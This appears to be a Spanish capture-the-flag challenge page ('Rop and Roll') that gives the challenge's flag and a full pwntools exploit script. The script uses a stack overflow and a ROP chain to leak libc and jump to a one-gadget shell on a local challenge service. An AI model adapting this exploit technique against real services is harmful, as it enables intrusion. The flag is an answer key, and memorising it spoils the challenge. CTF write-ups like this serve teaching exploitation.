# Rop and Roll

## Puntos

* Puntuación Máxima `400`
* Puntuación Mínima `300`
* Decadencia `10`

## Pista

None

## Flag

`bitup20{r0p3and0_p0r_14_c1ud4d!$$}`

## Adjuntos

* [rop-and-roll.zip](files/rop-and-roll.zip) (MD5: a587beae06604717e2d0fe937c0cd0b9)

## Deploy

Haz click [aqui](deploy) para ver como desplegar el reto con Docker. 

## Requerimientos

Se requiere tener instalado **Docker** para poder desplegar el reto.

## Descripcion

Con el nombre y categoria del reto no hace falta mucha más información por lo que os dejo esta gran canción para que la disfruteis:
https://www.youtube.com/watch?v=Y4Dn0daVEYA

## Solucion

```python

from pwn import *

p = remote("127.0.0.1", 7890)
libc = ELF("./libc.so.6")
#p = gdb.debug("./rop-and-roll")
#p = process("./rop-and-roll")

junk = "A"*72
printf_plt = p64(0x00401040)
fgets_got = p64(0x00404030)
main = p64(0x004011b4)
pop_rdi = p64(0x004012db)

p.recvuntil("it\n")
p.sendline("DEBUG-SYSTEM")
p.recvuntil("ERROR\n")

buf = junk + pop_rdi + fgets_got + printf_plt + main

p.sendline(buf)

leak_printf = u64(p.recv(0x6).ljust(8, '\x00'))
libc.address = leak_printf - libc.sym.fgets
log.success("Leak "+ hex(leak_printf))
log.success("Leak "+ hex(libc.address))

p.recvuntil("it\n")
p.sendline("DEBUG-SYSTEM")
p.recvuntil("ERROR\n")

buf = junk + (p64(libc.address + 0x0000000000103daa) + p64(0)*2)*2 + p64(libc.address + 0x4f365)

p.sendline(buf)

p.interactive()

```

## Referencias

* https://github.com/radareorg/radare2/
* https://github.com/longld/peda
* https://github.com/Gallopsled/pwntools 
* https://libc.blukat.me/?q=_rtld_global%3A0

